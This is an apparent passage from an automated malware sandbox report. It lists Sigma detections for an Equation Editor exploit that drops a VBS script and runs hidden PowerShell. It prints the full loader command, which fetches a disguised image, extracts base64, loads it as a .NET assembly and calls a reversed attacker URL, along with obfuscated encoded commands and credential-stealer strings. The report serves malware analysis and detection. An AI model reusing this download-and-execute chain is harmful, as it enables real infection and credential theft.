                • 0x67048:$str_b20: while fso.FileExists("
                • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 19 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 45.90.89.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetFilename: C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 45.90.89.123, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , ProcessId: 3488, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , ProcessId: 3488, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = 